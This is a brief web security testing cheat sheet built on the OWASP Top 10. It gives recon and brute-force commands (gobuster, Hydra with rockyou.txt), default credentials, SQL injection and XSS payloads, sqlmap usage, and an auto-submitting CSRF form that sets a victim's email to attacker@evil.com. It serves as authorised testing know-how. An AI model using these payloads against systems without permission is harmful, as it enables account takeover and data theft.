Web Security Testing

Web security testing guide based on OWASP methodology, covering key tests for each Top 10 category.

1. Application Recon

whatweb http://target.com
gobuster dir -u http://target.com -w big.txt -x php,html,js
curl http://target.com/robots.txt

2. Authentication Testing

hydra -l admin -P rockyou.txt target.com http-post-form \
  "/login:user=^USER^&pass=^PASS^:Invalid"
# Default creds: admin:admin | root:root | test:test
# JWT: decode at jwt.io, try alg=none attack

3. Authorisation / IDOR

GET /api/users/1/profile  → change to /api/users/2/profile
GET /download?file=invoice_001.pdf → invoice_002.pdf

4. SQL Injection

'              # SQL error = vulnerable
' OR '1'='1   # Returns all records
sqlmap -u "http://target.com/search?q=1" --dbs

5. XSS

<script>alert(1)</script>
<img src=x onerror=alert(1)>
<svg onload=alert(1)>

6. CSRF

<form action="http://target.com/change-email" method="POST">
  <input name="email" value="attacker@evil.com">
</form>
<script>document.forms[0].submit()</script>

7. Security Headers

curl -I https://target.com
# Check: Strict-Transport-Security, X-Content-Type-Options,
# X-Frame-Options, Content-Security-Policy
# Verify at: https://securityheaders.com/

8. SSL/TLS

nmap --script ssl-enum-ciphers -p 443 target.com
# Verify: TLS 1.2/1.3 enabled | TLS 1.0/1.1/SSL disabled
# Check at: https://www.ssllabs.com/ssltest/